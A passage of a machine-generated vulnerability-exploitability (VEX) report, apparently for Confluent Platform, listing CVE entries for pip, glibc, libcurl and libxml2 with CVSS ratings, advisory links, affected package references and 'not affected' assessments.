          "url": "http://www.openwall.com/lists/oss-security/2026/04/27/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6357"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/b369bfc96cc524e00c267e1693290e6599c36bad"
        },
        {
          "url": "https://github.com/pypa/pip/pull/13923"
        },
        {
          "url": "https://ichard26.github.io/blog/2026/04/whats-new-in-pip-26.1/#security-fixes"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6357"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6357"
        }
      ],
      "published": "2026-04-27T15:16:20+00:00",
      "updated": "2026-06-17T11:00:42+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/pip@26.0.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6368",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        908
      ],
      "description": "Calling wordexp with WRDE_APPEND in the GNU C Library version 2.0 to version 2.43\u00a0can cause the interface to return invalid memory in the we_wordv member, which on subsequent calls to wordfree may abort the process.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6368"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6368"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6368"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34090"
        },
        {
          "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2026-0014;h=1e9a0039f07471ddfe6816e5df04875bec409f92;hb=HEAD"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6368"
        }
      ],
      "published": "2026-08-10T19:17:30+00:00",
      "updated": "2026-08-12T18:18:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6429",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, libcurl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6429"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6429"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2pvc-5qw9-h3ph"
        },
        {
          "url": "https://hackerone.com/reports/3677759"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6429"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6429"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6653",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416,
        611
      ],
      "description": "Use After Free in libxml2's xmlParseInternalSubset from GNOME libxml2 version 2.9.11 to 2.11.0 allows a remote attacker to cause a denial-of-service via maliciously crafted XML input with improper entity resolution handling.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6653"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6653"
